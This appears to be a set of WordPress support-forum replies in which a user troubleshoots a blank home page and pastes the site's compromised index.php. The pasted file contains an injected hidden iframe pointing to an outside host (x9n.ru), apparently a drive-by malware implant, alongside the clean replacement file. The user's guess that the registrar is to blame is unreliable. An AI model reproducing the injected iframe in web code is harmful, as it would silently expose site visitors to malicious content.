srirambikkina
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Home Page Shows Blank After InstallationThank You, I will try that now.
Forum: Fixing WordPress
In reply to: Home Page Shows Blank After InstallationHi,
I did not put that code. My is basically a reseller hosting package. I also tried to delete the entire hosting package for nokiaappz.com and recreated it. How many times I do that the same problem comes up withi a day.I will try to put it in detail:
I have 3 domains:
1. nokiaapz.com
2. mobilelooks.com
3. onlineearninggurus.comOut of the 3 the first 2 are registered with Globat.com and the 3rd one with a different registrar.
I also tried to install wordpress with onlineearninggurus.com it has been 24 hours i installed wordpress in this domain and still it is working fine.I don’t know perfectly but my guess is that it may be a problem with the domain registrar.
Forum: Fixing WordPress
In reply to: Home Page Shows Blank After InstallationYes i tried to load a fresh copy of index.php but the same problem persists.
This is the index.php file that existed before replacement:
—————————————————————-
<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);/** Loads the WordPress Environment and Template */
require(‘./wp-blog-
<iframe src=”https://x9n.ru:8080/index.php” width=176 height=135 style=”visibility: hidden”></iframe>
?>
—————————————————————And this is the new code i replaced in the index.php file:
—————————————————————-
<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>
—————————————————————–